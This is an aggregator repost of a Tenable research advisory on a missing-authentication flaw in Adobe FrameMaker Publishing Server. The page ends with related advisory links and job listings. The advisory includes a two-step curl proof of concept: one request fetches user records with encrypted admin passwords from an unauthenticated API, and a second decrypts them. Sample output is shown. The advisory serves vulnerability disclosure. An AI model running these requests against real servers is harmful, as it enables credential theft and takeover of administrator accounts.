Missing Authentication for Critical Function in Adobe FrameMaker Publishing Server (FMPS) | allinfosecnews.com

Feb. 13, 2024, 6:09 p.m. | Jimi Sebree

Tenable Research Advisories www.tenable.com

Missing Authentication for Critical Function in Adobe FrameMaker Publishing Server (FMPS)

A vulnerability regarding missing authentication exists in Adobe FrameMaker Publishing Server (FMPS). This allows an unauthenticated remote attacker to access FMPS REST APIs. For example, the attacker can fetch user information (including encrypted password) for all FMPS users. The encrypted password can be decrypted by accessing a FMPS API. This allows the attacker to login to FMPS.

Proof of Concept

# curl 'http://:7000/v16/server/auth/'
[{"accessTokenExpires":"-1","userPermission":"ADMIN","userType":"ADMIN","userString":"NA","email":"fmpsuserAAA@enterprise.com","__schemaVersion":"16","_id":"6578e4aef9492a045082c7d7","username":"fmpsuserAAA","password":"6c2395917d6e121b3cb835c1ce9f69aaa1a9240cfab0cc0fe7df3e","user_denorm_string":"{\"_id\":\"6578e4aef9492a045082c7d7\",\"accessTokenExpires\":\"NA\",\"email\":\"fmpsuserAAA@enterprise.com\",\"password\":\"6c2395917d6e121b3cb835c1ce9f69aaa1a9240cfab0cc0fe7df3e\",\"userPermission\":\"ADMIN\",\"userString\":\"NA\",\"userType\":\"ADMIN\",\"username\":\"fmpsuserAAA\"}","__v":0,"accessToken":""}]

#curl -d 'password=6c2395917d6e121b3cb835c1ce9f69aaa1a9240cfab0cc0fe7df3e' 'http://:7000/v16/server/auth/decryptPassword'
"fmpsuserAAA" …

accesstoken admin adobe authentication critical email enterprise function missing password publishing server username

More from www.tenable.com / Tenable Research Advisories

Approach.App Multiple Vulnerabilities 1 week, 3 days ago | www.tenable.com

app application exploitation management +9

Karros Technologies Authentication Bypass 1 week, 3 days ago | www.tenable.com

authentication authentication bypass bypass technologies

Ivanti Avalanche WLAvalancheService.exe Unauthenticated Heap-based Buffer Overflow 1 week, 5 days ago | www.tenable.com

avalanche big buffer buffer overflow +12

Path Traversal Affecting Multiple CData Products 3 weeks, 3 days ago | www.tenable.com

application attachment cookie date +14

LG LED Assistant v2.1.65 Multiple Vulnerabilities 1 month ago | www.tenable.com

assistant led vulnerabilities

Arcserve Unified Data Protection 9.2 Multiple Vulnerabilities 1 month, 2 weeks ago | www.tenable.com

arcserve data data protection protection +1

Microsoft Azure Synapse Analytics - Privilege Escalation via Vegas Caching Service 1 month, 3 weeks ago | www.tenable.com

analytics azure azure synapse caching +8

Showdownjs Denial of Service 2 months ago | www.tenable.com

can command concept conditions +17

Missing Authentication for Critical Function in Adobe FrameMaker Publishing Server (FMPS) 2 months, 2 weeks ago | www.tenable.com

accesstoken admin adobe authentication +9

SOC 2 Manager, Audit and Certification

@ Deloitte | US and CA Multiple Locations

View on infosec-jobs.com

Security Architect - Identity and Access Management Architect (80-100% | Hybrid option)

@ Swiss Re | Madrid, M, ES

View on infosec-jobs.com

Alternant - Consultant HSE (F-H-X)

@ Bureau Veritas Group | MULHOUSE, Grand Est, FR

View on infosec-jobs.com

Senior Risk/Cyber Security Analyst

@ Baker Hughes | IN-KA-BANGALORE-NEON BUILDING WEST TOWER

View on infosec-jobs.com

Offensive Security Engineer (University Grad)

@ Meta | Bellevue, WA | Menlo Park, CA | Seattle, WA | Washington, DC | New York City

View on infosec-jobs.com

Senior IAM Security Engineer

@ Norfolk Southern | Atlanta, GA, US, 30308

View on infosec-jobs.com